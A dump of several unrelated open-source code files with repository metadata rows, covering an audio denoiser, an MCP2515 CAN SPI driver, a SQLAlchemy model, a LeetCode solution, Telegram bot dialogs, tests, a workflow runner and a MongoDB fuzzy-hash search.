data = data[offset:len(data)-max_offset+offset]
# ... or leave as is.
else:
offset = 0
# Spectrogram
S = np.abs(librosa.stft(data))[:-1,:]
return S
def denoise(self, path_to_audio):
'''
Denoises input with autoencoder.
'''
# Load spectrogram
S = self.preprocess(path_to_audio)
# Get dimensions
dim_1 = S.shape[0]
dim_2 = S.shape[1]
# Reshape as input tensor
S = np.reshape(S, (1, dim_1, dim_2, 1))
S /= self.fitting_constant
# Get denoised spectrogram from autoencoder
S_denoised = self.model.predict(S).reshape((dim_1, dim_2))
# Convert denoised spectrogram to time series waveform
denoised = librosa.griffinlim(S_denoised) * self.fitting_constant
return denoised
#%%
def Denoise_AE():
# Ensure single instance of AE
if _Denoise_AE()._instance is None:
_Denoise_AE._instance = _Denoise_AE()
_Denoise_AE.model = keras.models.load_model(PATH_TO_TRAINED_MODEL)
return _Denoise_AE._instance
#%%
if __name__ == "__main__":
dnae = Denoise_AE()
dnae2 = Denoise_AE()
assert dnae is dnae2
denoised = dnae.denoise(PATH_TO_AUDIO)
soundfile.write(PATH_TO_SAVE, denoised, dnae.SAMPLE_RATE) | 30.245098 | 80 | 0.625284 | 2,023 | 0.655754 | 0 | 0 | 0 | 0 | 0 | 0 | 1,152 | 0.37342 |
2bb629029f6d9ac0a63d285ca3b6e11796d43870 | 10,171 | py | Python | mcp2515.py | sifosifo/MCP2515LinuxDriver | 14e933a81626980ec7c9c9830335383fdd7abe3a | [
"BSD-3-Clause"
] | 3 | 2018-01-31T11:54:21.000Z | 2020-02-13T08:12:07.000Z | mcp2515.py | sifosifo/MCP2515LinuxDriver | 14e933a81626980ec7c9c9830335383fdd7abe3a | [
"BSD-3-Clause"
] | 1 | 2020-02-15T06:01:39.000Z | 2020-02-27T05:23:43.000Z | mcp2515.py | sifosifo/MCP2515LinuxDriver | 14e933a81626980ec7c9c9830335383fdd7abe3a | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import spidev
class mcp2515:
SPI_RESET = 0xC0
SPI_READ = 0x03
SPI_READ_RX = 0x90
SPI_WRITE = 0x02
SPI_WRITE_TX = 0x40
SPI_RTS = 0x80
SPI_READ_STATUS = 0xA0
SPI_RX_STATUS = 0xB0
SPI_BIT_MODIFY = 0x05
#/* Configuration Registers */
CANSTAT = 0x0E
CANCTRL = 0x0F
BFPCTRL = 0x0C
TEC = 0x1C
REC = 0x1D
CNF3 = 0x28
CNF2 = 0x29
CNF1 = 0x2A
CANINTE = 0x2B
CANINTF = 0x2C
EFLG = 0x2D
TXRTSCTRL = 0x0D
#/* Recieve Filters */
RXF0SIDH = 0x00
RXF0SIDL = 0x01
RXF0EID8 = 0x02
RXF0EID0 = 0x03
RXF1SIDH = 0x04
RXF1SIDL = 0x05
RXF1EID8 = 0x06
RXF1EID0 = 0x07
RXF2SIDH = 0x08
RXF2SIDL = 0x09
RXF2EID8 = 0x0A
RXF2EID0 = 0x0B
RXF3SIDH = 0x10
RXF3SIDL = 0x11
RXF3EID8 = 0x12
RXF3EID0 = 0x13
RXF4SIDH = 0x14
RXF4SIDL = 0x15
RXF4EID8 = 0x16
RXF4EID0 = 0x17
RXF5SIDH = 0x18
RXF5SIDL = 0x19
RXF5EID8 = 0x1A
RXF5EID0 = 0x1B
#/* Receive Masks */
RXM0SIDH = 0x20
RXM0SIDL = 0x21
RXM0EID8 = 0x22
RXM0EID0 = 0x23
RXM1SIDH = 0x24
RXM1SIDL = 0x25
RXM1EID8 = 0x26
RXM1EID0 = 0x27
#/* Tx Buffer 0 */
TXB0CTRL = 0x30
TXB0SIDH = 0x31
TXB0SIDL = 0x32
TXB0EID8 = 0x33
TXB0EID0 = 0x34
TXB0DLC = 0x35
TXB0D0 = 0x36
TXB0D1 = 0x37
TXB0D2 = 0x38
TXB0D3 = 0x39
TXB0D4 = 0x3A
TXB0D5 = 0x3B
TXB0D6 = 0x3C
TXB0D7 = 0x3D
#/* Tx Buffer 1 */
TXB1CTRL = 0x40
TXB1SIDH = 0x41
TXB1SIDL = 0x42
TXB1EID8 = 0x43
TXB1EID0 = 0x44
TXB1DLC = 0x45
TXB1D0 = 0x46
TXB1D1 = 0x47
TXB1D2 = 0x48
TXB1D3 = 0x49
TXB1D4 = 0x4A
TXB1D5 = 0x4B
TXB1D6 = 0x4C
TXB1D7 = 0x4D
#/* Tx Buffer 2 */
TXB2CTRL = 0x50
TXB2SIDH = 0x51
TXB2SIDL = 0x52
TXB2EID8 = 0x53
TXB2EID0 = 0x54
TXB2DLC = 0x55
TXB2D0 = 0x56
TXB2D1 = 0x57
TXB2D2 = 0x58
TXB2D3 = 0x59
TXB2D4 = 0x5A
TXB2D5 = 0x5B
TXB2D6 = 0x5C
TXB2D7 = 0x5D
#/* Rx Buffer 0 */
RXB0CTRL = 0x60
RXB0SIDH = 0x61
RXB0SIDL = 0x62
RXB0EID8 = 0x63
RXB0EID0 = 0x64
RXB0DLC = 0x65
RXB0D0 = 0x66
RXB0D1 = 0x67
RXB0D2 = 0x68
RXB0D3 = 0x69
RXB0D4 = 0x6A
RXB0D5 = 0x6B
RXB0D6 = 0x6C
RXB0D7 = 0x6D
#/* Rx Buffer 1 */
RXB1CTRL = 0x70
RXB1SIDH = 0x71
RXB1SIDL = 0x72
RXB1EID8 = 0x73
RXB1EID0 = 0x74
RXB1DLC = 0x75
RXB1D0 = 0x76
RXB1D1 = 0x77
RXB1D2 = 0x78
RXB1D3 = 0x79
RXB1D4 = 0x7A
RXB1D5 = 0x7B
RXB1D6 = 0x7C
RXB1D7 = 0x7D
#/*******************************************************************
# * Bit register masks *
# *******************************************************************/
#/* TXBnCTRL */
TXREQ = 0x08
TXP = 0x03
#/* RXBnCTRL */
RXM = 0x60
BUKT = 0x04
#/* CANCTRL */
REQOP = 0xE0
ABAT = 0x10
OSM = 0x08
CLKEN = 0x04
CLKPRE = 0x03
#/* CANSTAT */
REQOP = 0xE0
ICOD = 0x0E
#/* CANINTE */
RX0IE = 0x01
RX1IE = 0x02
TX0IE = 0x04
TX1IE = 0x80
TX2IE = 0x10
ERRIE = 0x20
WAKIE = 0x40
MERRE = 0x80
#/* CANINTF */
RX0IF = 0x01
RX1IF = 0x02
TX0IF = 0x04
TX1IF = 0x80
TX2IF = 0x10
ERRIF = 0x20
WAKIF = 0x40
MERRF = 0x80
#/* BFPCTRL */
B1BFS = 0x20
B0BFS = 0x10
B1BFE = 0x08
B0BFE = 0x04
B1BFM = 0x02
B0BFM = 0x01
#/* CNF1 Masks */
SJW = 0xC0
BRP = 0x3F
#/* CNF2 Masks */
BTLMODE = 0x80
SAM = 0x40
PHSEG1 = 0x38
PRSEG = 0x07
#/* CNF3 Masks */
WAKFIL = 0x40
PHSEG2 = 0x07
#/* TXRTSCTRL Masks */
TXB2RTS = 0x04
TXB1RTS = 0x02
TXB0RTS = 0x01
#/*******************************************************************
# * Bit Timing Configuration *
# *******************************************************************/
#/* CNF1 */
SJW_1TQ = 0x40
SJW_2TQ = 0x80
SJW_3TQ = 0x90
SJW_4TQ = 0xC0
#/* CNF2 */
BTLMODE_CNF3 = 0x80
BTLMODE_PH1_IPT = 0x00
SMPL_3X = 0x40
SMPL_1X = 0x00
PHSEG1_8TQ = 0x38
PHSEG1_7TQ = 0x30
PHSEG1_6TQ = 0x28
PHSEG1_5TQ = 0x20
PHSEG1_4TQ = 0x18
PHSEG1_3TQ = 0x10
PHSEG1_2TQ = 0x08
PHSEG1_1TQ = 0x00
PRSEG_8TQ = 0x07
PRSEG_7TQ = 0x06
PRSEG_6TQ = 0x05
PRSEG_5TQ = 0x04
PRSEG_4TQ = 0x03
PRSEG_3TQ = 0x02
PRSEG_2TQ = 0x01
PRSEG_1TQ = 0x00
#/* CNF3 */
PHSEG2_8TQ = 0x07
PHSEG2_7TQ = 0x06
PHSEG2_6TQ = 0x05
PHSEG2_5TQ = 0x04
PHSEG2_4TQ = 0x03
PHSEG2_3TQ = 0x02
PHSEG2_2TQ = 0x01
PHSEG2_1TQ = 0x00
SOF_ENABLED = 0x80
WAKFIL_ENABLED = 0x40
WAKFIL_DISABLED = 0x00
#/*******************************************************************
# * Control/Configuration Registers *
# *******************************************************************/
#/* CANINTE */
RX0IE_ENABLED = 0x01
RX0IE_DISABLED = 0x00
RX1IE_ENABLED = 0x02
RX1IE_DISABLED = 0x00
G_RXIE_ENABLED = 0x03
G_RXIE_DISABLED = 0x00
TX0IE_ENABLED = 0x04
TX0IE_DISABLED = 0x00
TX1IE_ENABLED = 0x08
TX2IE_DISABLED = 0x00
TX2IE_ENABLED = 0x10
TX2IE_DISABLED = 0x00
G_TXIE_ENABLED = 0x1C
G_TXIE_DISABLED = 0x00
ERRIE_ENABLED = 0x20
ERRIE_DISABLED = 0x00
WAKIE_ENABLED = 0x40
WAKIE_DISABLED = 0x00
IVRE_ENABLED = 0x80
IVRE_DISABLED = 0x00
#/* CANINTF */
RX0IF_SET = 0x01
RX0IF_RESET = 0x00
RX1IF_SET = 0x02
RX1IF_RESET = 0x00
TX0IF_SET = 0x04
TX0IF_RESET = 0x00
TX1IF_SET = 0x08
TX2IF_RESET = 0x00
TX2IF_SET = 0x10
TX2IF_RESET = 0x00
ERRIF_SET = 0x20
ERRIF_RESET = 0x00
WAKIF_SET = 0x40
WAKIF_RESET = 0x00
IVRF_SET = 0x80
IVRF_RESET = 0x00
#/* CANCTRL */
REQOP_CONFIG = 0x80
REQOP_LISTEN = 0x60
REQOP_LOOPBACK = 0x40
REQOP_SLEEP = 0x20
REQOP_NORMAL = 0x00
ABORT = 0x10
OSM_ENABLED = 0x08
CLKOUT_ENABLED = 0x04
CLKOUT_DISABLED = 0x00
CLKOUT_PRE_8 = 0x03
CLKOUT_PRE_4 = 0x02
CLKOUT_PRE_2 = 0x01
CLKOUT_PRE_1 = 0x00
#/* CANSTAT */
OPMODE_CONFIG = 0x80
OPMODE_LISTEN = 0x60
OPMODE_LOOPBACK = 0x40
OPMODE_SLEEP = 0x20
OPMODE_NORMAL = 0x00
#/* RXBnCTRL */
RXM_RCV_ALL = 0x60
RXM_VALID_EXT = 0x40
RXM_VALID_STD = 0x20
RXM_VALID_ALL = 0x00
RXRTR_REMOTE = 0x08
RXRTR_NO_REMOTE = 0x00
BUKT_ROLLOVER = 0x04
BUKT_NO_ROLLOVER = 0x00
FILHIT0_FLTR_1 = 0x01
FILHIT0_FLTR_0 = 0x00
FILHIT1_FLTR_5 = 0x05
FILHIT1_FLTR_4 = 0x04
FILHIT1_FLTR_3 = 0x03
FILHIT1_FLTR_2 = 0x02
FILHIT1_FLTR_1 = 0x01
FILHIT1_FLTR_0 = 0x00
#/* TXBnCTRL */
TXREQ_SET = 0x08
TXREQ_CLEAR = 0x00
TXP_HIGHEST = 0x03
TXP_INTER_HIGH = 0x02
TXP_INTER_LOW = 0x01
TXP_LOWEST = 0x00
#/*******************************************************************
# * Register Bit Masks *
# *******************************************************************/
DLC_0 = 0x00
DLC_1 = 0x01
DLC_2 = 0x02
DLC_3 = 0x03
DLC_4 = 0x04
DLC_5 = 0x05
DLC_6 = 0x06
DLC_7 = 0x07
DLC_8 = 0x08
#/*******************************************************************
# * CAN SPI commands *
# *******************************************************************/
CAN_RESET = 0xC0
CAN_READ = 0x03
CAN_WRITE = 0x02
CAN_RTS = 0x80
CAN_RTS_TXB0 = 0x81
CAN_RTS_TXB1 = 0x82
CAN_RTS_TXB2 = 0x84
CAN_RD_STATUS = 0xA0
CAN_BIT_MODIFY = 0x05
CAN_RX_STATUS = 0xB0
CAN_RD_RX_BUFF = 0x90
CAN_LOAD_TX = 0x40
#/*******************************************************************
# * Miscellaneous *
# *******************************************************************/
DUMMY_BYTE = 0x00
TXB0 = 0x31
TXB1 = 0x41
TXB2 = 0x51
RXB0 = 0x61
RXB1 = 0x71
EXIDE_SET = 0x08
EXIDE_RESET = 0x00
#MCP2515
CAN_10Kbps = 0x31
CAN_25Kbps = 0x13
CAN_50Kbps = 0x09
CAN_100Kbps = 0x04
CAN_125Kbps = 0x03
CAN_250Kbps = 0x01
CAN_500Kbps = 0x00
def __init__(self):
self.spi = spidev.SpiDev()
self.spi.open(0, 0)
self.spi.max_speed_hz = 500000
self.spi.mode = 0b11
command = [self.SPI_RESET]
self.spi.writebytes(command)
def WriteRegister(self, Register, Data):
command = [self.SPI_WRITE, Register] + Data
self.spi.writebytes(command)
def ReadRegister(self, Register, n):
Data = [self.SPI_READ, Register] + [0]*n
#print Data
self.spi.xfer(Data)
#print Data
return(Data[2:])
def BitModify(self, Register, Mask, Value):
# print "BitModify(Reg=0x%x, Mask=0x%x, Value=0x%x)" % (Register, Mask, Value)
command = [self.SPI_BIT_MODIFY, Register] + [Mask, Value]
self.spi.writebytes(command)
def ReadStatus(self, type):
Data = [type, 0xFF]
self.spi.xfer(Data)
return(Data[1])
| 22.256018 | 79 | 0.478714 | 10,135 | 0.996461 | 0 | 0 | 0 | 0 | 0 | 0 | 1,830 | 0.179923 |
2bb62b6a718f65b1214f64e28be9ca336c62449b | 3,809 | py | Python | model/grouptrack.py | janhradek/regaudio | e3ead0b19f016c645985e5f779414076306be7e0 | [
"Zlib"
] | null | null | null | model/grouptrack.py | janhradek/regaudio | e3ead0b19f016c645985e5f779414076306be7e0 | [
"Zlib"
] | null | null | null | model/grouptrack.py | janhradek/regaudio | e3ead0b19f016c645985e5f779414076306be7e0 | [
"Zlib"
] | null | null | null | import sqlalchemy
from .base import Base
from .track import Track
import model.tracktime
class GroupTrack(Base):
'''
a link between group and track (association pattern)
backrefs group and track (not listed here)
To use this first create the group, then group tracks,
then tracks and add them to grouptracks,
then add grouptracks to group
Association Object
'''
__tablename__ = "grouptracks"
idno = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
trackid = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey("tracks.idno"))#, primary_key = True)
groupid = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey("groups.idno"))#, primary_key = True)
no = sqlalchemy.Column(sqlalchemy.Integer)
# time doesnt work well with qt mvc and with python
fromms = sqlalchemy.Column(sqlalchemy.Integer)
lengthms = sqlalchemy.Column(sqlalchemy.Integer)
#track = sqlalchemy.orm.relationship("Track", backref="grouptracks")
headers = Track.headers[:]
headers.insert(0, "No")
headers.append("From")
headers.append("Length")
innerheaders = 1 # the track headers start from second index
def __init__(self, no, froms, lengths):
self.no = no
self.fromms = froms
self.lengthms = lengths
def bycol(self, col, newvalue=None, edit=False):
col = GroupTrack.translatecol(col)
if col < 0:
return self.track.bycol(-1-col, newvalue, edit)
if col == 0:
if newvalue != None:
self.no = newvalue
return True
return self.no
elif col == 1:
if newvalue != None:
nw, ok = model.tracktime.strtototal(newvalue)
if ok: self.fromms = nw
return ok
return model.tracktime.totaltostr(self.fromms, edit)
elif col == 2:
if newvalue != None:
nw, ok = model.tracktime.strtototal(newvalue)
if ok: self.lengthms = nw
return ok
return model.tracktime.totaltostr(self.lengthms, edit)
return None
def tipbycol(self, col):
col = GroupTrack.translatecol(col)
if col < 0:
return self.track.tipbycol(-1-col)
return None
@classmethod
def colbycol(cls, col):
col = cls.translatecol(col)
if col < 0:
return Track.colbycol(-1-col)
if col == 0:
return cls.no
elif col == 1:
return cls.fromms
elif col == 2:
return cls.lengthms
@classmethod
def isStar(cls,col):
col = cls.translatecol(col)
if col < 0:
return Track.isStar(-1-col)
else:
return False
@classmethod
def isCheck(cls, col):
col = cls.translatecol(col)
if col < 0:
return Track.isCheck(-1-col)
else:
return False
@classmethod
def translatecol(cls, col):
'''
"translate" the column number to the Track or to local index
a column in grouptrack (positive) or track (negative - 1)
'''
if col >= cls.innerheaders and col < cls.innerheaders + len(Track.headers):
return cls.innerheaders - col - 1
elif col >= cls.innerheaders + len(Track.headers):
return col - len(Track.headers)
return col
@classmethod
def translateorder(cls, direction, col):
"""translate the column number to/from Track
if direction then translate to track
return < 0 if the col doesn't have counterpart
"""
if direction: # gt -> t
return -1 - cls.translatecol(col)
else: # t -> gt
return cls.innerheaders + col
| 30.96748 | 111 | 0.593594 | 3,717 | 0.975847 | 0 | 0 | 1,462 | 0.383828 | 0 | 0 | 866 | 0.227356 |
2bb8dd1b3871424dc498a9ab4db3881c1e6c6772 | 1,584 | py | Python | LeetCodeSolver/pythonSolutions/from201to300/Solution213.py | ZeromaXHe/Learning-Platform | ec75c2dbd472a568d1cd482450cc471295659c62 | [
"Apache-2.0"
] | null | null | null | LeetCodeSolver/pythonSolutions/from201to300/Solution213.py | ZeromaXHe/Learning-Platform | ec75c2dbd472a568d1cd482450cc471295659c62 | [
"Apache-2.0"
] | null | null | null | LeetCodeSolver/pythonSolutions/from201to300/Solution213.py | ZeromaXHe/Learning-Platform | ec75c2dbd472a568d1cd482450cc471295659c62 | [
"Apache-2.0"
] | null | null | null | from typing import List
class Solution:
"""
213.打家劫舍II | 难度:中等 | 标签:动态规划
你是一个专业的小偷,计划偷窃沿街的房屋,每间房内都藏有一定的现金。这个地方所有的房屋都 围成一圈 ,这意味着第一个房屋和最后一个房屋是紧挨着的。同时,相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警 。
<p>
给定一个代表每个房屋存放金额的非负整数数组,计算你 在不触动警报装置的情况下 ,能够偷窃到的最高金额。
<p>
示例 1:
输入:nums = [2,3,2]
输出:3
解释:你不能先偷窃 1 号房屋(金额 = 2),然后偷窃 3 号房屋(金额 = 2), 因为他们是相邻的。
<p>
示例 2:
输入:nums = [1,2,3,1]
输出:4
解释:你可以先偷窃 1 号房屋(金额 = 1),然后偷窃 3 号房屋(金额 = 3)。
偷窃到的最高金额 = 1 + 3 = 4 。
<p>
示例 3:
输入:nums = [0]
输出:0
<p>
提示:
1 <= nums.length <= 100
0 <= nums[i] <= 1000
<p>
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/house-robber-ii
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
def rob(self, nums: List[int]) -> int:
"""
执行用时: 44 ms , 在所有 Python3 提交中击败了 36.21% 的用户
内存消耗: 15 MB , 在所有 Python3 提交中击败了 17.47% 的用户
:param nums:
:return:
"""
n = len(nums)
if n == 1:
return nums[0]
if n == 2:
return max(nums[1], nums[0])
dp_no_rob_first = [0] * n
dp_rob_first = [0] * n
dp_no_rob_first[0] = 0
dp_no_rob_first[1] = nums[1]
dp_rob_first[0] = nums[0]
dp_rob_first[1] = max(nums[1], nums[0])
for i in range(2, n):
dp_rob_first[i] = max(dp_rob_first[i - 2] + nums[i], dp_rob_first[i - 1])
dp_no_rob_first[i] = max(dp_no_rob_first[i - 2] + nums[i], dp_no_rob_first[i - 1])
return max(dp_no_rob_first[n - 1], dp_rob_first[n - 2])
| 27.789474 | 125 | 0.541667 | 2,291 | 0.988352 | 0 | 0 | 0 | 0 | 0 | 0 | 1,600 | 0.69025 |
2bb98fcaa1938a0b80ec364136a3876078651d5b | 2,083 | py | Python | dialogs.py | 6dba/async-telegram-bot | 3950f5bc51be9f2f93924442948a98db52332d8e | [
"MIT"
] | null | null | null | dialogs.py | 6dba/async-telegram-bot | 3950f5bc51be9f2f93924442948a98db52332d8e | [
"MIT"
] | null | null | null | dialogs.py | 6dba/async-telegram-bot | 3950f5bc51be9f2f93924442948a98db52332d8e | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from aiogram.types import ReplyKeyboardRemove, \
ReplyKeyboardMarkup, KeyboardButton, \
InlineKeyboardMarkup, InlineKeyboardButton
"""Диалоги бота"""
@dataclass(frozen=True)
class Messages:
SMILE = ['🤷♀️','🧐','🤷♂️','🤔','😐','🤨','🤯','🥱','👀','👋','💊','🙅♀️','🎇','🗿']
start_html: str = "Добро пожаловать, <b>{first_name}!</b> 🕺\nЯ бот, созданный для того, чтобы напоминать тебе - пора пить таблеточки!"
help: str = """<b>Я бот - помощник!</b> 🗿\nУмею напоминать о том, что пора принимать лекарства! 🧬\n\nВ главном меню ты сможешь создать, просмотреть или редактировать напоминание 😯\n\nНажав на название препарата, можно перейти в магазин, чтобы изучить подробнее или даже купить! 💸\n\nДавай начнём, пиши: /menu 📌"""
mainMenu: str = "🔮 Выбери действие:"
edit: str = "🔮 Выбери действие:"
start_addplan: str = "Я задам несколько вопросов, прошу отвечать корректно 🙆"
drug_name_addplan: str = "Как называется препарат? 🤨"
allday_message: str = "Напоминания будут приходить в течение дня: \n\nУтром - 08:00\nДнём - 12:00\nВечером - 18:00\n"
idontknow: str = "<b>Я не знаю, что с этим делать</b> 🤷♀️\nНапомню, есть команда: /help"
None_pills: str = "<b>Пусто..</b>\nКажется, у тебя ещё не добавлено никаких напоминаний 🧐 \nСамое время начать!🗿"
pills_limit: str = "Хэй-хэй, слишком много таблеточек добавляешь! \nПопробуй удалить уже оконченные курсы..🗿"
drug_exist: str = "Думаю, такой уже есть.. "
input_error: str = "Попробуй ввести ещё раз.. "
input_error_time: str = "Напиши что-то в формате: <u><i>19:00</i></u> или <u><i>09:25</i></u> "
input_unreal: str = "Хм.. Не верю.. Попробуй ввести ещё раз "
input_more_than_need: str = "Хм.. Не думаю, что стоит пить больше, чем нужно.. Попробуй ввести ещё раз "
input_error_dose: str = "Напиши что-то в формате: <u><i>1</i></u> или <u><i>0.25</i></u> "
exist_drug_and_dose: str = "Думаю, препарат с данной дозировкой уже есть.. "
message = Messages()
| 40.057692 | 318 | 0.649544 | 2,743 | 0.911296 | 0 | 0 | 2,768 | 0.919601 | 0 | 0 | 2,248 | 0.746844 |
2bbb687f364745f2b77d52b36e535e60715406d8 | 1,584 | py | Python | reflexy/base/tests/test_reflex.py | eso/reflexy | 5ea03bae806488c01a53ccffe9701066baa5964d | [
"BSD-3-Clause"
] | null | null | null | reflexy/base/tests/test_reflex.py | eso/reflexy | 5ea03bae806488c01a53ccffe9701066baa5964d | [
"BSD-3-Clause"
] | null | null | null | reflexy/base/tests/test_reflex.py | eso/reflexy | 5ea03bae806488c01a53ccffe9701066baa5964d | [
"BSD-3-Clause"
] | null | null | null | import unittest
from reflexy.base import reflex
class TestReflexModule(unittest.TestCase):
sof = 'datasetname|file1.fits;PRO_CATG1;PURPOSE1:PURPOSE2,file2;' \
'PRO_CAT2;PURPOSE1'
sopexp = [('long_param1', '3'), ('param2', '3'), ('param3', 'ser'),
('param_not_shown', 'none')]
sop = 'recipe_name:long_param1=3,recipe_name:param2=3,' \
'recipe_name:param3=ser,recipe_name:param_not_shown=none'
def test_parseSof(self):
r = reflex.parseSof(self.sof)
self.assertEqual(len(r), 2)
self.assertEqual(r.datasetName, 'datasetname')
f1, f2 = r.files
self.assertEqual(f1.name, 'file1.fits')
self.assertEqual(f1.category, 'PRO_CATG1')
self.assertEqual(len(f1.purposes), 2)
self.assertIn('PURPOSE1', f1.purposes)
self.assertIn('PURPOSE2', f1.purposes)
self.assertEqual(f2.name, 'file2')
self.assertEqual(f2.category, 'PRO_CAT2')
self.assertEqual(len(f2.purposes), 1)
self.assertEqual(f2.purposes[0], 'PURPOSE1')
def test_parseRoundTripJson(self):
r = reflex.parseSof(self.sof)
j = r.toJSON()
r2 = reflex.parseSofJson(j)
self.assertEqual(r, r2)
def test_parseSop(self):
r = reflex.parseSop(self.sop)
self.assertEqual(len(r), len(self.sopexp))
for p, ep in zip(r, self.sopexp):
self.assertEqual(p.recipe, 'recipe_name')
self.assertEqual(p.displayName, ep[0])
self.assertEqual(p.value, ep[1])
if __name__ == "__main__":
unittest.main()
| 35.2 | 71 | 0.625631 | 1,485 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 353 | 0.222854 |
2bbc1f15ebca775f3d32d7270961e05f3489946d | 1,240 | py | Python | usaspending_api/common/tests/test_limitable_serializer.py | truthiswill/usaspending-api | bd7d915442e2ec94cc830c480ceeffd4479be6c0 | [
"CC0-1.0"
] | null | null | null | usaspending_api/common/tests/test_limitable_serializer.py | truthiswill/usaspending-api | bd7d915442e2ec94cc830c480ceeffd4479be6c0 | [
"CC0-1.0"
] | 3 | 2020-02-12T01:16:46.000Z | 2021-06-10T20:36:57.000Z | usaspending_api/common/tests/test_limitable_serializer.py | truthiswill/usaspending-api | bd7d915442e2ec94cc830c480ceeffd4479be6c0 | [
"CC0-1.0"
] | null | null | null | import pytest
import json
from model_mommy import mommy
from usaspending_api.awards.models import Award
@pytest.fixture
def mock_limitable_data():
mommy.make(Award, _fill_optional=True)
@pytest.mark.django_db
def test_nested_field_limiting(client, mock_limitable_data):
request_object = {
"fields": ["piid", "recipient__recipient_name"]
}
response = client.post(
"/api/v1/awards/",
content_type='application/json',
data=json.dumps(request_object),
format='json')
results = response.data["results"][0]
assert "piid" in results.keys()
assert "recipient" in results.keys()
assert "recipient_name" in results.get("recipient", {}).keys()
@pytest.mark.django_db
def test_nested_field_exclusion(client, mock_limitable_data):
request_object = {
"exclude": ["piid", "recipient__recipient_name"]
}
response = client.post(
"/api/v1/awards/",
content_type='application/json',
data=json.dumps(request_object),
format='json')
results = response.data["results"][0]
assert "piid" not in results.keys()
assert "recipient" in results.keys()
assert "recipient_name" not in results.get("recipient").keys()
| 24.8 | 66 | 0.678226 | 0 | 0 | 0 | 0 | 1,125 | 0.907258 | 0 | 0 | 271 | 0.218548 |
2bbd518b542fcf51bf60ace183944d104900efbf | 55 | py | Python | luigi/contrib/__init__.py | Mappy/luigi | 539cd2cf69902bb6cef688afdf55e991cae4b537 | [
"Apache-2.0"
] | 2 | 2017-05-03T12:15:20.000Z | 2018-09-14T02:28:54.000Z | luigi/contrib/__init__.py | Mappy/luigi | 539cd2cf69902bb6cef688afdf55e991cae4b537 | [
"Apache-2.0"
] | null | null | null | luigi/contrib/__init__.py | Mappy/luigi | 539cd2cf69902bb6cef688afdf55e991cae4b537 | [
"Apache-2.0"
] | null | null | null | """Package containing optional and-on functionality.""" | 55 | 55 | 0.781818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 1 |
2bbd83bd7fa3a6706dcfa519b317d2baf63d98d2 | 1,993 | py | Python | ronny/runner.py | ynop/ronny | f40c0d22d02c70bb7994f84db11ead45208b6287 | [
"MIT"
] | null | null | null | ronny/runner.py | ynop/ronny | f40c0d22d02c70bb7994f84db11ead45208b6287 | [
"MIT"
] | null | null | null | ronny/runner.py | ynop/ronny | f40c0d22d02c70bb7994f84db11ead45208b6287 | [
"MIT"
] | null | null | null | import sys
import argparse
import os
import re
import yaml
from . import workflow
class Runner(object):
tasks = [
]
out_and_cache_subfolder_with_sumatra_label = True
def run(self):
parser = argparse.ArgumentParser(description='Run workflow')
parser.add_argument('config_path', type=str)
parser.add_argument('--workdir', type=str, default=None)
parser.add_argument('--out', type=str, default=None)
parser.add_argument('--cache', type=str, default=None)
parser.add_argument('--range', type=str, default=None)
args = parser.parse_args()
config = self._load_config(args.config_path)
out_path = args.out
cache_path = args.cache
if self.out_and_cache_subfolder_with_sumatra_label and 'sumatra_label' in config:
if out_path:
out_path = os.path.join(out_path, config['sumatra_label'])
if cache_path:
cache_path = os.path.join(cache_path, config['sumatra_label'])
tasks = []
if args.range:
single_id_match = re.match(r'^(\d*)$', args.range)
start_end_match = re.match(r'^(\d*)-(\d*)$', args.range)
if single_id_match is not None:
tasks = [int(single_id_match.group(1))]
elif start_end_match is not None:
start = int(start_end_match.group(1))
end = int(start_end_match.group(2))
if end >= start:
tasks = [x for x in range(start, end + 1)]
wf = workflow.Workflow(config, available_tasks=self._get_task_dictionary(), work_dir=args.workdir, output_path=out_path,
cache_path=cache_path)
wf.run(tasks_to_execute=tasks)
def _get_task_dictionary(self):
return {k.name: k for k in self.tasks}
def _load_config(self, path):
with open(path, 'r') as yml_file:
cfg = yaml.load(yml_file)
return cfg
| 30.661538 | 128 | 0.60562 | 1,906 | 0.956347 | 0 | 0 | 0 | 0 | 0 | 0 | 137 | 0.068741 |
2bbda0a6bf0bc0ed91be9d1635d26984ee81885c | 1,422 | py | Python | src/Query/apifuzz.py | codexgigassys/codex-backend | 1e6b946f05e2fd9ce80b207046fe168f49cc2db2 | [
"MIT"
] | 161 | 2016-08-03T14:25:20.000Z | 2021-08-11T03:18:35.000Z | src/Query/apifuzz.py | codexgigassys/codex-backend | 1e6b946f05e2fd9ce80b207046fe168f49cc2db2 | [
"MIT"
] | 115 | 2016-08-08T09:24:08.000Z | 2020-03-07T06:48:02.000Z | src/Query/apifuzz.py | codexgigassys/codex-backend | 1e6b946f05e2fd9ce80b207046fe168f49cc2db2 | [
"MIT"
] | 46 | 2016-08-04T08:25:28.000Z | 2021-09-05T23:46:55.000Z | # Copyright (C) 2016 Deloitte Argentina.
# This file is part of CodexGigas - https://github.com/codexgigassys/
# See the file 'LICENSE' for copying permission.
import pathmagic
from pymongo import MongoClient
import ssdeep
from env import envget
def searchFuzzy(fuzz, limit, thresh):
client = MongoClient(envget('metadata.host'), envget('metadata.port'))
db = client[envget('db_metadata_name')]
coll_meta = db["db_metadata_collection"]
f1 = coll_meta.find({}, {"file_id": 1, "fuzzy_hash": 1}).limit(limit)
l = []
for f in f1:
l.append(f)
ret = {}
for a in l:
res = -1
try:
res = ssdeep.compare(a["fuzzy_hash"], fuzz)
except InternalError:
print(str(res) + "------" +
str(a["fuzzy_hash"]) + "-----" + str(a["file_id"]))
continue
if(res >= thresh):
ret[a["file_id"]] = res
return ret
def searchFull(search, limit):
# print("1")
client = MongoClient(envget('metadata.host'), envget('metadata.port'))
# print("2")
db = client[envget('db_metadata_name')]
# print("3")
coll_meta = db["db_metadata_collection"]
# print("4")
f1 = coll_meta.find(search).limit(limit)
# print("5")
l = []
for f in f1:
l.append(f)
# print("6")
ret = []
for a in l:
ret.append(str(a["file_id"]))
# print("7")
return ret
